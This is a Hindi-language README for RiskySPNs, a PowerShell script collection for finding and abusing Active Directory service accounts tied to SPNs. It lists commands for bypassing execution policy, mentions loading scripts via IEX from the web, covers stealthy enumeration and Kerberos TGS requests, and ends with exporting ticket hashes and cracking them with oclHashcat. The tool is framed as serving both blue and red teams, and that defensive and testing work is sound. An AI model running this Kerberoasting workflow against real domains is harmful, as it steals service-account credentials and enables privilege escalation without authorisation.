
जोखिम भरे SPNs का पता लगाएँ और उनका दुरुपयोग करें
RiskySPNs PowerShell स्क्रिप्ट्स का एक संग्रह है जो SPN (सर्विस प्रिंसिपल नेम) से जुड़े खातों का पता लगाने और उनका दुरुपयोग करने पर केंद्रित है। यह मॉड्यूल ब्लू टीमों को संभावित जोखिम भरे SPN की पहचान करने में मदद कर सकता है, साथ ही रेड टीमों को केरबेरोस और एक्टिव डायरेक्टरी का लाभ उठाकर विशेषाधिकार बढ़ाने में सहायता कर सकता है।
विस्तृत जानकारी के लिए: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
या केवल स्क्रिप्ट लोड करें (आप IEX वेब से भी कर सकते हैं)
. .\Find-PotentiallyCrackableAccounts.ps1
सुनिश्चित करें कि Set-ExecutionPolicy Unrestricted या Bypass पर सेट हो
Get-Help Get-TGSCipher -Full
सभी फ़ंक्शन में -Verbose मोड भी उपलब्ध है
संभावित कमज़ोर खाते खोजें
Find-PotentiallyCrackableAccounts
संवेदनशील + RC4 = $$$
संवेदनशील खातों के बारे में पूर्ण विस्तृत रिपोर्ट उत्पन्न करें (CISO <3)
Export-PotentiallyCrackableAccounts
SPN के लिए Kerberos TGS का अनुरोध करें
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
या
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3